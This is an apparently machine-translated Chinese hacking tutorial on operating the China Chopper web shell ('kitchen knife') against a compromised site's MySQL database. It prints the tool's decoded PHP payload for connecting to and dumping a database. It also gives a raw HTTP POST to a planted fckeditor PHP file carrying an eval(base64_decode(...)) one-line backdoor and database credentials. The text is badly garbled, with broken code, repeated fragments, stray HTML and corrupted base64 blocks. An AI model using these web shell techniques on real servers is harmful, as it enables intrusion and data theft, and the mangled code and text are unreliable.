Solve the Problem of chopper kitchen knife operating mysql database garbled in one sentence

If gbk and other non-gb2312 are found, garbled characters will inevitably occur after the client tool is connected using a sentence from the kitchen knife. It is useless to adjust the encoding method of the tool.

1. packet capture base64 decryption: z0 in The post variable is the following statement (no red statement ):

@ Ini_set ("display_errors", "0"); @ set_time_limit (0); @ set_magic_quotes_runtime (0); echo ("-> | ");; $ m = get_magic_quotes_gpc (); $ hst = $ m? Stripslashes ($ _ POST ["z1"]): $ _ POST ["z1"]; $ usr = $ m? Stripslashes ($ _ POST ["z2"]): $ _ POST ["z2"]; $ pwd = $ m? Stripslashes ($ _ POST ["z3"]): $ _ POST ["z3"]; $ dbn = $ m? Stripslashes ($ _ POST ["z4"]): $ _ POST ["z4"]; $ SQL = base64_decode ($ _ POST ["z5"]); $ T = @ mysql_connect ($ hst, $ usr, $ pwd); @ mysql_select_db ($ dbn); @ mysql_query ("set names gbk "); $ q = @ mysql_query ($ SQL); $ I = 0; while (<A href = mailto: $ col = @ mysql_field_name ($ q, $ I )) {echo ($ col. "|"); $ I % 2b % 2b;} echo (""); while ($ col = @ mysql_field_name ($ q, $ I) {echo ($ col. "|"); $ I % 2b % 2b;} echo (""); while ($ rs = @ mysql_fetch_row ($ q) {for ($ c = 0; $ c <$ I; $ c % 2b % 2b) {echo (trim ($ rs [$ c]); echo ("| ");} echo ("") ;}@ mysql_close ($ T); echo ("| <-"); die "> $ rs = @ mysql_fetch_row ($ q )) {for ($ c = 0; $ c <$ I; $ c % 2b % 2b) {echo (trim ($ rs [$ c]); echo ("|") ;}echo ("") ;}@ mysql_close ($ T); echo ("| <-"); die> $ col = @ mysql_field_name ($ q, $ I) {echo ($ col. "|"); $ I % 2b % 2b;} echo (""); while ($ rs = @ mysql_fetch_row ($ q) {for ($ c = 0; $ c <$ I; $ c % 2b % 2b) {echo (trim ($ rs [$ c]); echo ("| ");} echo ("") ;}@ mysql_close ($ T); echo ("| <-"); die ();
2. After re-encryption (note that the + number has been replaced by % 2b,/% 2f:

Bytes

21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vja8oii0% 2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0% %%%%%%%%

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

C3FsX2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7

3. If you cannot use a kitchen knife, use the custom post submission tool, such as the original nc:

 

POST/fckeditor/xxx. php HTTP/1.1
Referer: http://xxx.com

Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (Windows NT 5.1) Firefox/3.0.0.1
Host: xxxxx.com

Content-Length: 1227
Cache-Control: no-cache
Cookie: _ utma = signature; _ utmz = 70948559.1300526684.1.1.utmcsr = (direct) | utmccn = (direct) | utmcmd = (none); PHPSESSID = Signature

<A href = "mailto: fuck9518 = @ eval (base64_decode ($ _ POST [chr (122). chr (48)]); & z0 = Signature

0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjaguar 8oii0% 2bfCIpOzskbT1nZXRfbWFnaWNfcXVvdGVzX2dwYygpOyRoc3Q9JG0% %%%%%%%

Bytes

Bytes

Bytes

Bytes

Bytes

Required & z1 =

Localhost & z2 = localnewsssB & z3 = local_ddd & z4 = db_9518 & z5 = xxxxx "> fuck9518 = @ eval (base64_decode ($ _ POST [chr (122 ). chr (48)]); & z0 = random

C2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjar8oii0 % region % Region

Bytes

Bytes

Bytes

Bytes

Bytes

X2Nsb3NlKCRUKTs7ZWNobygifDwtIik7ZGllKCk7 & z1 = localhost & z2 = localnewsssB & z3 = local_ddd & z4 =

Db_9518 & z5 = xxxxx

Specify z5 as the base64 encoding of the SQL statement.